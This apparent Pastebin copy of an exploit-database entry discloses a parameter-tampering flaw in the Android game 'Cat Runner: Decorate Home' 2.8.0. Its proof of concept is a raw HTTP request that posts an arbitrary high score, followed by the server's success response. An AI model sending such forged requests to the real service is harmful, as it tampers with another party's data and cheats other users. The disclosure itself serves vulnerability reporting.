Advertisement
Guest User

CatRunner

a guest
Apr 23rd, 2019
5,466
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.37 KB | None | 0 0
  1. # Cat Runner: Decorate Home - External Control of Assumed-Immutable Web Parameter
  2. # Date: Jan 17, 2019
  3. # Software Link: https://play.google.com/store/apps/details?id=com.solou.catendless.run&hl=en
  4. # Version: 2.8.0 Android App
  5. # Vendor: Ivy
  6. # Exploit Author: Loc Phan Van
  7. # Category: Mobile Apps
  8. # Tested on: Android 8.1
  9.  
  10. # Description
  11. # The application API does not sufficiently verify inputs that are assumed to be immutable but are actually
  12. # externally controllable. The attackers can manipulate its parameters exchanged between client and server in
  13. # order to modify application data, and gain benefits for their own account. In this case, the score parameter of # users can be changed externally.
  14.  
  15. #PoC
  16.  
  17. Request:
  18.  
  19. Post //index/commit HTTP/1.1
  20. Content-type: application/x-www-form-urlencoded
  21. X-Unity-Version: 5.6.4f1
  22. User-agent: Dalvik/2.1.0 (Linuxl; U; Android 5.1.1; SN-G920V Build/LVY47X)
  23. Host: card.matchJplay.com
  24. Connection: close
  25. Accept-Encoding: gzip, deflate
  26. Content-Length: 89
  27.  
  28. uid=1aef329eb95be620abfa417d20112b2e&appid=2419&tag=Highschore&score=151414141&week201903
  29.  
  30. Response
  31.  
  32. HTTP/1.1 200 OK
  33. Server: nginx/1.14.0
  34. Date: Thu, 17 Jan 2019 03:49:55 GMT
  35. Content-type: text/hmlt, charset-UTF-8
  36. Connection: close
  37. X-Powered-By: PHP/7.2.6
  38. Content-Length: 28
  39.  
  40. {"status":1 ,"msg" : "success"}
  41.  
  42. References:
  43. https://www.youtube.com/watch?v=u5iEeLZnYVg
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement